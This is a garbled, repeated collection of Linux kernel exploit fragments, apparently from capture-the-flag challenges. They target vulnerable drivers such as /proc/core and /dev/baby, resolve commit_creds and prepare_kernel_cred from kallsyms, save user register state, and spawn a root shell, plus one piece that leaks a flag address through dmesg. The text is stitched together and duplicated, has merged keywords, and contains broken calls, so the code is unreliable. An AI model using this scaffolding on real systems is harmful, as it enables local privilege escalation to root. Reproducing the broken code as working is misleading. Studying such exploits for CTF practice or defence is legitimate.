size_t user_cs, user_ss, user_rflags, user_sp; voidsaveStatus() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("\033[34m\033[1m[*] Status has been saved.\033[0m"); }
voidgetRootShell() { if(getuid()) { printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n"); exit(-1); } printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n"); system("/bin/sh"); }
int fd = open("/proc/core", 2); if(fd<0) { printf("\033[31m\033[1m[x] Failed to open the file: /proc/core !\033[0m\n"); exit(-1); }
FILE* sym_table_fd = open("/tmp/kallsyms", "r"); if(sym_table_fd < 0) { printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n"); exit(-1); } char buf[0x50], type[0x10]; size_t addr; while(fscanf(sym_table_fd, "%llx%s%s", &addr, type, buf)) { if(prepare_kernel_cred && commit_creds) break; if(!commit_creds && !strcmp(buf, "commit_creds")) { commit_creds = addr; printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds); continue; }
if(!strcmp(buf, "prepare_kernel_cred")) { prepare_kernel_cred = addr; printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred); continue; } }
size_t user_cs, user_ss, user_rflags, user_sp; voidsaveStatus() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("\033[34m\033[1m[*] Status has been saved.\033[0m"); }
voidgetRootShell() { if(getuid()) { printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n"); exit(-1); } printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n"); system("/bin/sh"); }
intmain() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
int fd = open("/proc/core", 2); if(fd<0) { printf("\033[31m\033[1m[x] Failed to open the file: /proc/core !\033[0m\n"); exit(-1); } puts("\033[34m\033[1m[*] debug1\033[0m");
FILE* sym_table_fd = fopen("/tmp/kallsyms", "r"); if(sym_table_fd < 0) { printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n"); exit(-1); } puts("\033[34m\033[1m[*] debug2\033[0m"); char buf[0x50], type[0x10]; size_t addr; while(fscanf(sym_table_fd, "%llx%s%s", &addr, type, buf)) { if(prepare_kernel_cred && commit_creds) break; if(!commit_creds && !strcmp(buf, "commit_creds")) { commit_creds = addr; printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds); continue; }
if(!strcmp(buf, "prepare_kernel_cred")) { prepare_kernel_cred = addr; printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred); continue; } } puts("\033[34m\033[1m[*] debug3\033[0m");
size_t user_cs, user_ss, user_rflags, user_sp; void saveStatus() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("\033[34m\033[1m[*] Status has been saved.\033[0m"); }
void getRootShell() { if(getuid()) { printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n"); exit(-1); } printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n"); system("/bin/sh"); }
int main() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
int fd = open("/proc/core", 2); if(fd<0) { printf("\033[31m\033[1m[x] Failed to open the file: /proc/core !\033[0m\n"); exit(-1); } puts("\033[34m\033[1m[*] debug1\033[0m");
FILE* sym_table_fd = fopen("/tmp/kallsyms", "r"); if(sym_table_fd < 0) { printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n"); exit(-1); } puts("\033[34m\033[1m[*] debug2\033[0m"); char buf[0x50], type[0x10]; size_t addr; while(fscanf(sym_table_fd, "%llx%s%s", &addr, type, buf)) { if(prepare_kernel_cred && commit_creds) break; if(!commit_creds && !strcmp(buf, "commit_creds")) { commit_creds = addr; printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds); continue; }
if(!strcmp(buf, "prepare_kernel_cred")) { prepare_kernel_cred = addr; printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred); continue; } } puts("\033[34m\033[1m[*] debug3\033[0m");
size_t user_cs, user_ss, user_rflags, user_sp; voidsaveStatus() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("\033[34m\033[1m[*] Status has been saved.\033[0m"); }
voidgetRootShell() { if(getuid()) { printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n"); exit(-1); } printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n"); system("/bin/sh"); }
intmain() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
int fd = open("/dev/test", 2); if(fd<0) { printf("\033[31m\033[1m[x] Failed to open the file: /dev/test !\033[0m\n"); exit(-1); }
FILE* sym_table_fd = fopen("/tmp/kallsyms", "r"); if(sym_table_fd < 0) { printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n"); exit(-1); } char buf[0x50], type[0x10]; size_t addr; while(fscanf(sym_table_fd, "%llx%s%s", &addr, type, buf)) { if(prepare_kernel_cred && commit_creds) break; if(!commit_creds && !strcmp(buf, "commit_creds")) { commit_creds = addr; printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds); continue; }
if(!strcmp(buf, "prepare_kernel_cred")) { prepare_kernel_cred = addr; printf("\033[32m\033[1m[+] Successful to get the addr of prepare_kernel_cred:\033[0m%llx\n", prepare_kernel_cred); continue; } }
int closing; unsignedchar *write_buf; int write_cnt; /* If the tty has a pending do_SAK, queue it here - akpm */ structwork_structSAK_work; structtty_port *port; } __randomize_layout;
/* Each of a tty's open files has private_data pointing to tty_file_private */ structtty_file_private { structtty_struct *tty; structfile *file; structlist_headlist; };
size_t user_cs, user_ss, user_rflags, user_sp; voidsaveStatus() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("\033[34m\033[1m[*] Status has been saved.\033[0m"); }
voidgetRootShell() { if(getuid()) { printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n"); exit(-1); } printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n"); system("/bin/sh"); }
intmain() { printf("\033[34m\033[1m[*] Start to exploit...\033[0m\n"); saveStatus();
FILE* sym_table_fd = fopen("/proc/kallsyms", "r"); if(sym_table_fd < 0) { printf("\033[31m\033[1m[x] Failed to open the sym_table file!\033[0m\n"); exit(-1); } char buf[0x50], type[0x10]; size_t addr; while(fscanf(sym_table_fd, "%llx%s%s", &addr, type, buf)) { if(prepare_kernel_cred && commit_creds) break; if(!commit_creds && !strcmp(buf, "commit_creds")) { commit_creds = addr; printf("\033[32m\033[1m[+] Successful to get the addr of commit_cread:\033[0m%llx\n", commit_creds); continue; }
intmain() { int fd1 = open("/dev/baby", 2); if(fd1<0) { printf("\033[31m\033[1m[x] Failed to open the file: /dev/baby !\033[0m\n"); exit(-1); }
ioctl(fd1, 0x6666); system("dmesg | grep flag >/tmp/addr"); int fd2 = open("/tmp/addr", 2); if(fd2<0) { printf("\033[31m\033[1m[x] Failed to open the file: /tmp/addr !\033[0m\n"); exit(-1); }
char* temp = malloc(0x200); read(fd2, temp, 0x100); char* start = strstr(temp, "Your flag is at "); if(start == 0) { printf("[-] Not Found!"); } flag_addr = strtoull(start+16, start+32, 16); printf("\033[32m\033[1m[+] flag_addr : %p\033[0m\n", flag_addr);